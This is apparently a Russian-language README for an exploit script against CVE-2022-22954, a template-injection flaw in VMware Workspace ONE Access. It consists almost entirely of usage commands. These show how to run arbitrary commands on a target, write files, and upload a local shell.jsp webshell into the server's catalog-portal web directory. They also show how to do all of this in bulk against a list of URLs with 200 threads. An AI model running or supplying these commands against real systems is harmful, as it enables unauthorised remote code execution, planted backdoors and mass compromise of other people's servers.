
CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI-уязвимость: выполнение команд, скрипт массового обнаружения, запись файлов
Обнаружение нескольких точек срабатывания уязвимости, многопоточное пакетное обнаружение, выполнение команд, запись файлов
// Обнаружение одиночной цели
python CVE-2022-22954.py -u https://x.x.x.x
// Выполнение команды
python CVE-2022-22954.py -u https://x.x.x.x -c "id"
// Запись файла
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp -fc "test"
// Загрузка файла, в Windows необходимо указать путь
python CVE-2022-22954.py -u https://x.x.x.x -fn test.jsp -fp "D:\Desktop\shell.jsp"
// Загрузка в указанный путь
python CVE-2022-22954.py -u https://x.x.x.x -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp" -fp "D:\Desktop\shell.jsp"
// Пакетное обнаружение, использование аналогично
python CVE-2022-22954.py -f url.txt
python CVE-2022-22954.py -f url.txt -c "id" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp -fc "test" -t 200
python CVE-2022-22954.py -f url.txt -fn test.jsp -fp "D:\Desktop\shell.jsp" -t 200
python CVE-2022-22954.py -f url.txt -fn "/opt/vmware/horizon/workspace/webapps/catalog-portal/test.jsp" -fp "D:\Desktop\shell.jsp" -t 200
